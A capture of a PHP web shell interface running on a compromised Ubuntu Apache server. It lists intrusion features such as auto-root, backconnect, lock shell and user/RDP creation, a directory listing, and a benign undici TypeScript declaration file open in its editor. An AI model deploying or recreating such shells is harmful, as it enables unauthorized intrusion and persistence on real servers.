Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
undici-types /
[ HOME SHELL ]
Name
Size
Permission
Action
README.md
455
B
-rw-rw-r--
agent.d.ts
1.04
KB
-rw-rw-r--
api.d.ts
1.42
KB
-rw-rw-r--
balanced-pool.d.ts
609
B
-rw-rw-r--
cache.d.ts
1.22
KB
-rw-rw-r--
client.d.ts
4.52
KB
-rw-rw-r--
connector.d.ts
1
KB
-rw-rw-r--
content-type.d.ts
561
B
-rw-rw-r--
cookies.d.ts
635
B
-rw-rw-r--
diagnostics-channel.d.ts
1.6
KB
-rw-rw-r--
dispatcher.d.ts
13.1
KB
-rw-rw-r--
errors.d.ts
3.64
KB
-rw-rw-r--
fetch.d.ts
5.33
KB
-rw-rw-r--
file.d.ts
1.67
KB
-rw-rw-r--
filereader.d.ts
1.42
KB
-rw-rw-r--
formdata.d.ts
4.89
KB
-rw-rw-r--
global-dispatcher.d.ts
276
B
-rw-rw-r--
global-origin.d.ts
175
B
-rw-rw-r--
handlers.d.ts
387
B
-rw-rw-r--
header.d.ts
133
B
-rw-rw-r--
index.d.ts
2.9
KB
-rw-rw-r--
interceptors.d.ts
215
B
-rw-rw-r--
mock-agent.d.ts
2.48
KB
-rw-rw-r--
mock-client.d.ts
1002
B
-rw-rw-r--
mock-errors.d.ts
338
B
-rw-rw-r--
mock-interceptor.d.ts
3.8
KB
-rw-rw-r--
mock-pool.d.ts
974
B
-rw-rw-r--
package.json
1.17
KB
-rw-rw-r--
patch.d.ts
1.64
KB
-rw-rw-r--
pool-stats.d.ts
669
B
-rw-rw-r--
pool.d.ts
1008
B
-rw-rw-r--
proxy-agent.d.ts
836
B
-rw-rw-r--
readable.d.ts
1.58
KB
-rw-rw-r--
webidl.d.ts
5.5
KB
-rw-rw-r--
websocket.d.ts
3.35
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : client.d.ts
import { URL } from 'url' import { TlsOptions } from 'tls' import Dispatcher from './dispatcher' import buildConnector from "./connector"; /** * A basic HTTP/1.1 client, mapped on top a single TCP/TLS connection. Pipelining is disabled by default. */ export class Client extends Dispatcher { constructor(url: string | URL, options?: Client.Options); /** Property to get and set the pipelining factor. */ pipelining: number; /** `true` after `client.close()` has been called. */ closed: boolean; /** `true` after `client.destroyed()` has been called or `client.close()` has been called and the client shutdown has completed. */ destroyed: boolean; } export declare namespace Client { export interface OptionsInterceptors { Client: readonly Dispatcher.DispatchInterceptor[]; } export interface Options { /** TODO */ interceptors?: OptionsInterceptors; /** The maximum length of request headers in bytes. Default: Node.js' `--max-http-header-size` or `16384` (16KiB). */ maxHeaderSize?: number; /** The amount of time, in milliseconds, the parser will wait to receive the complete HTTP headers (Node 14 and above only). Default: `300e3` milliseconds (300s). */ headersTimeout?: number; /** @deprecated unsupported socketTimeout, use headersTimeout & bodyTimeout instead */ socketTimeout?: never; /** @deprecated unsupported requestTimeout, use headersTimeout & bodyTimeout instead */ requestTimeout?: never; /** TODO */ connectTimeout?: number; /** The timeout after which a request will time out, in milliseconds. Monitors time between receiving body data. Use `0` to disable it entirely. Default: `300e3` milliseconds (300s). */ bodyTimeout?: number; /** @deprecated unsupported idleTimeout, use keepAliveTimeout instead */ idleTimeout?: never; /** @deprecated unsupported keepAlive, use pipelining=0 instead */ keepAlive?: never; /** the timeout, in milliseconds, after which a socket without active requests will time out. Monitors time between activity on a connected socket. This value may be overridden by *keep-alive* hints from the server. Default: `4e3` milliseconds (4s). */ keepAliveTimeout?: number; /** @deprecated unsupported maxKeepAliveTimeout, use keepAliveMaxTimeout instead */ maxKeepAliveTimeout?: never; /** the maximum allowed `idleTimeout`, in milliseconds, when overridden by *keep-alive* hints from the server. Default: `600e3` milliseconds (10min). */ keepAliveMaxTimeout?: number; /** A number of milliseconds subtracted from server *keep-alive* hints when overriding `idleTimeout` to account for timing inaccuracies caused by e.g. transport latency. Default: `1e3` milliseconds (1s). */ keepAliveTimeoutThreshold?: number; /** TODO */ socketPath?: string; /** The amount of concurrent requests to be sent over the single TCP/TLS connection according to [RFC7230](https://tools.ietf.org/html/rfc7230#section-6.3.2). Default: `1`. */ pipelining?: number; /** @deprecated use the connect option instead */ tls?: never; /** If `true`, an error is thrown when the request content-length header doesn't match the length of the request body. Default: `true`. */ strictContentLength?: boolean; /** TODO */ maxCachedSessions?: number; /** TODO */ maxRedirections?: number; /** TODO */ connect?: buildConnector.BuildOptions | buildConnector.connector; /** TODO */ maxRequestsPerClient?: number; /** TODO */ localAddress?: string; /** Max response body size in bytes, -1 is disabled */ maxResponseSize?: number; /** Enables a family autodetection algorithm that loosely implements section 5 of RFC 8305. */ autoSelectFamily?: boolean; /** The amount of time in milliseconds to wait for a connection attempt to finish before trying the next address when using the `autoSelectFamily` option. */ autoSelectFamilyAttemptTimeout?: number; /** * @description Enables support for H2 if the server has assigned bigger priority to it through ALPN negotiation. * @default false */ allowH2?: boolean; /** * @description Dictates the maximum number of concurrent streams for a single H2 session. It can be overriden by a SETTINGS remote frame. * @default 100 */ maxConcurrentStreams?: number } export interface SocketInfo { localAddress?: string localPort?: number remoteAddress?: string remotePort?: number remoteFamily?: string timeout?: number bytesWritten?: number bytesRead?: number } } export default Client;
Close